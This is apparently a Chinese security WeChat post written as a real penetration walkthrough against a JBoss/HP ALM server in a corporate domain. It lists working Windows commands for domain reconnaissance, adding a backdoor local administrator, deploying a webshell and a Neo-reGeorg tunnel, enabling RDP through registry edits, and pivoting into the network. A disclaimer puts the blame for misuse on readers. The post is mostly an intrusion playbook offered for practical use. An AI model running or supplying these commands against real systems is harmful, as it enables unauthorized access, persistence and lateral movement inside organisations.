免责声明
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把藏剑安全“设为星标”,否则可能就看不到了啦!
实战渗透
01
攻击目标
一眼Jboos
02
盘他
步骤一:使用漏洞探测工具发现存在反序列化漏洞...且命令收集以下信息
net user //存在域用户,为域环境
tasklist /svc //不存在杀毒软件,但可能存在流量查杀软件
ipconfig /all //存在域:otr-ict.chn 且为内网环境
netstat -an | findstr 3389 //未开启RDP服务
setspn -q */* //查看SPN信息,只有域控
nltest /domain_trusts //单域
net user sis2212 [email protected] /add //success
net localgroup administrators sis2212 /add //success
步骤二:这里直接使用PowerShell上线,发现该主机使用CDN服务.....
步骤三:尝试GetShell...这里是真的难啊
#查询weblogic端口下的程序
shell netstat -anb //8181--》QCJavaService.exe
#查询程序对应的存放目录
shell wmic process where name="QCJavaService.exe" get processid,executablepath,name
//--》 C:\ProgramData\HP\ALM\JBoss\bin\QCJavaService.exe
#查询上传webshell的目录
C:\ProgramData\HP\ALM\jboss\server\default\deploy\ROOT.war //这里直接上传peak马和regeorg文件
#备注:
这里翻遍了磁盘目录,很是无语
步骤四:访问shell.jsp并使用蚁剑链接....访问t0l.jsp(Neo-reGeorg服务端)成功...
步骤五:使用以下命令开启RDP服务并搭建通信隧道...
#开启RDP服务
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
#查看端口号
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
步骤六:连通通信隧道并使用SockCap64进入,远程桌面链接....
03
总结